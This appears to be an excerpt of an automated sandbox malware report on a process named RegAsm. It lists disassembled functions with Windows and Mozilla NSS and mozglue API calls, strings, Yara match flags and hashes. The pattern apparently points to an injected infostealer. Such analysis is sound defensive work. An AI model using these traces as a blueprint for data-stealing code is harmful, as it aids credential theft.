                                                                                    • Instruction Fuzzy Hash: 1F41B1B87002159FDF00CFE9D9C5A9677B8EB89318F008169ED15A7B40F730E904CBA5
                                                                                    Function 0040E204 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                    • String ID: 0123456789ABCDEF
                                                                                    • API String ID: 1978830238-2554083253
                                                                                    • Opcode ID: a2989fa1e50e5d37120eefcfde3128a28aff9e0de93a4de063f4f4f7d77498a0
                                                                                    • Instruction ID: aacaa05fe8bfb0e3e580230c96c2234c1107ce4164968389f5103032efb5c2f5
                                                                                    • Opcode Fuzzy Hash: a2989fa1e50e5d37120eefcfde3128a28aff9e0de93a4de063f4f4f7d77498a0
                                                                                    • Instruction Fuzzy Hash: 9631C272A00115AFDB04EFAACC45AAF7BADEF49354B00447EF901EB2D1DA789905C764
                                                                                    Function 6CC31E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EC1
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EE1
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F38
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F5C
                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC31F83
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FC0
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FE2
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FF6
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC32019
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 2055633661-2608361144
                                                                                    • Opcode ID: a8e5292d97d38529cc530a25ba1d5e297e7eff6e685b3af6487fa51d015deab8
                                                                                    • Instruction ID: bd456f5023fca5b3950fc2b9c186538b2e9f57e5a177241b6ba9974f19da1abf
                                                                                    • Opcode Fuzzy Hash: a8e5292d97d38529cc530a25ba1d5e297e7eff6e685b3af6487fa51d015deab8
                                                                                    • Instruction Fuzzy Hash: E541C175B002258FDF009FE9D8D8B6A37B5EF4A748F140069F909A7741EB7598048BD9
                                                                                    Function 6CC95FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6CC96009
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC96024
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CC3EE51,?), ref: 6CC96046
                                                                                    • OutputDebugStringA.KERNEL32(?,6CC3EE51,?), ref: 6CC96061
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC96069
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96073
                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96082
                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CCB148E), ref: 6CC96091
                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CC3EE51,00000000,?), ref: 6CC960BA
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC960C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                    • String ID:
                                                                                    • API String ID: 3835517998-0
                                                                                    • Opcode ID: 1c4ecad380a71adc1bab727fc8fc6dbdfbb1e15581c2204a0f7a149ec270915f
                                                                                    • Instruction ID: 3e53671e8ef5929d5497ef3d81b90d9c2128a7ac96b1f4b1926f6fe6d3086454
                                                                                    • Opcode Fuzzy Hash: 1c4ecad380a71adc1bab727fc8fc6dbdfbb1e15581c2204a0f7a149ec270915f
                                                                                    • Instruction Fuzzy Hash: F521F4B1A002189FDF105F64DC88AAE7BB8FF45318F008428F81AD7680DB74A559CFE9
                                                                                    Function 6CC80000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80039
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC80041
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80075
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC80082
                                                                                    • moz_xmalloc.MOZGLUE(00000048), ref: 6CC80090
                                                                                    • free.MOZGLUE(?), ref: 6CC80104
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC8011B
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6CC8005B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                    • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                    • API String ID: 3012294017-637075127
                                                                                    • Opcode ID: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                                    • Instruction ID: 22c0f6446ab873f43d50a64293b96aeef2e6e76e590fc671d4a1a890a38f3f90
                                                                                    • Opcode Fuzzy Hash: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                                    • Instruction Fuzzy Hash: D44180796016549FCB10CFA5C880A9BBBF1FF49318F40451DE95A93B50EB31E815CFA5
                                                                                    Function 6CC47E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC47EA7
                                                                                    • malloc.MOZGLUE(00000001), ref: 6CC47EB3
                                                                                      • Part of subcall function 6CC4CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC4CB49
                                                                                      • Part of subcall function 6CC4CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC4CBB6
                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC47EC4
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6CC47F19
                                                                                    • malloc.MOZGLUE(?), ref: 6CC47F36
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC47F4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                    • String ID: d
                                                                                    • API String ID: 204725295-2564639436
                                                                                    • Opcode ID: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                                    • Instruction ID: b889903a3ecdc4c8aa6a2d9b55165ef10a0482e4a8d708589b91b3302115cd16
                                                                                    • Opcode Fuzzy Hash: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                                    • Instruction Fuzzy Hash: 55310861E0474897EB009BA8DC449FEB778EF96308F049369ED4957612FB31A9C8C390
                                                                                    Function 6CD8ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CD8ACE6
                                                                                    • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD8AD14
                                                                                    • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD8AD23
                                                                                      • Part of subcall function 6CE6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE6D963
                                                                                    • PR_LogPrint.NSS3(?,00000000), ref: 6CD8AD39
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: L_strncpyzPrint$L_strcatn
                                                                                    • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nl
                                                                                    • API String ID: 332880674-1116290892
                                                                                    • Opcode ID: c1103f5f2736ca9640751a55e7e614f653a9c1156034aa9b5fdd4772a5aecba3
                                                                                    • Instruction ID: 7621dd45a8b533af3c8bfc8902c111db10d6a09f94b2e9100a57cb93cd9ddcf0
                                                                                    • Opcode Fuzzy Hash: c1103f5f2736ca9640751a55e7e614f653a9c1156034aa9b5fdd4772a5aecba3
                                                                                    • Instruction Fuzzy Hash: 63212971B02114DFDB019B64DE88B7A33B5AF4230DF544429E90DDBBA1EB30A808C7A6
                                                                                    Function 004103A0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?), ref: 004103E2
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?,00000000), ref: 004103E9
                                                                                    • wsprintfA.USER32 ref: 004103FB
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                    • String ID: %dx%d
                                                                                    • API String ID: 3940144428-2206825331
                                                                                    • Opcode ID: 30f86b60f930c873313ec7c5774ef3a48a17be0fe37c96a3dd60c61a3b553a6d
                                                                                    • Instruction ID: abe2dc7565195900069bf305cbe27ff29e290cf18ddbcc6ac3f8b37d05cd60ac
                                                                                    • Opcode Fuzzy Hash: 30f86b60f930c873313ec7c5774ef3a48a17be0fe37c96a3dd60c61a3b553a6d
                                                                                    • Instruction Fuzzy Hash: 70F0AD35A01224FBE7106BA1AC0DE9F7E6DFF4ABA5F001015FA0193150D6B449018BB4
                                                                                    Function 6CC43E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CC43EEE
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43FDC
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CC44006
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC440A1
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440AF
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440C2
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC44134
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44143
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                    • String ID:
                                                                                    • API String ID: 3680524765-0
                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction ID: 14fd4fb397468fd9184bf2fffdb0c221c118ec1c83516fd763b5dbf68b263557
                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction Fuzzy Hash: 57A172B1A00215CFEB40CF69C880659B7F5FF88314F29C599D909AF752E772D856CBA0
                                                                                    Function 6CC32030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,6CC53F47,?,?,?,6CC53F47,6CC51A70,?), ref: 6CC3207F
                                                                                    • memset.VCRUNTIME140(?,000000E5,6CC53F47,?,6CC53F47,6CC51A70,?), ref: 6CC320DD
                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6CC53F47,6CC51A70,?), ref: 6CC3211A
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32145
                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6CC53F47,6CC51A70,?), ref: 6CC321BA
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC321E0
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32232
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                    • API String ID: 889484744-884734703
                                                                                    • Opcode ID: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                                    • Instruction ID: 204fc627109df70c3c88df9551e345408041ca825da1858674256c2b6f525715
                                                                                    • Opcode Fuzzy Hash: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                                    • Instruction Fuzzy Hash: 9861D331F002268FCF04CAA9DDA9B6E76B1AF85314F294239E528A7A95F7719C00C7C5
                                                                                    Function 6CC348E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6CC7483A,?), ref: 6CC34ACB
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6CC7483A,?), ref: 6CC34AE0
                                                                                    • moz_xmalloc.MOZGLUE(FFFE15BF,?,6CC7483A,?), ref: 6CC34A82
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6CC7483A,?), ref: 6CC34A97
                                                                                    • moz_xmalloc.MOZGLUE(15D4E801,?,6CC7483A,?), ref: 6CC34A35
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6CC7483A,?), ref: 6CC34A4A
                                                                                    • moz_xmalloc.MOZGLUE(15D4E824,?,6CC7483A,?), ref: 6CC34AF4
                                                                                    • moz_xmalloc.MOZGLUE(FFFE15E2,?,6CC7483A,?), ref: 6CC34B10
                                                                                    • moz_xmalloc.MOZGLUE(8E8E0022,?,6CC7483A,?), ref: 6CC34B2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                    • String ID:
                                                                                    • API String ID: 4251373892-0
                                                                                    • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction ID: 6891b6da4bcde1f6712743714a6eeca5b4cc3b6490a889f9630283d82afbf301
                                                                                    • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction Fuzzy Hash: E0715BB19007069FC754CF69D580AAABBF5FF09308B10863ED15A9BB51F732E995CB80
                                                                                    Function 6CC89D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC88273), ref: 6CC89D65
                                                                                    • free.MOZGLUE(6CC88273,?), ref: 6CC89D7C
                                                                                    • free.MOZGLUE(?,?), ref: 6CC89D92
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC89E0F
                                                                                    • free.MOZGLUE(6CC8946B,?,?), ref: 6CC89E24
                                                                                    • free.MOZGLUE(?,?,?), ref: 6CC89E3A
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC89EC8
                                                                                    • free.MOZGLUE(6CC8946B,?,?,?), ref: 6CC89EDF
                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6CC89EF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                                    • Instruction ID: 4a635acd91bfd117a0395710259883c8385e3520b466af2a8eec46a4ff0ec448
                                                                                    • Opcode Fuzzy Hash: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                                    • Instruction Fuzzy Hash: B9719EB090AB418BC712CF18C48055BFBF4FF99319B448659E89A5BB02FB30F895CB95
                                                                                    Function 6CC8DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC8DDCF
                                                                                      • Part of subcall function 6CC6FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC6FA4B
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE0D
                                                                                    • free.MOZGLUE(00000000), ref: 6CC8DE41
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE5F
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEA3
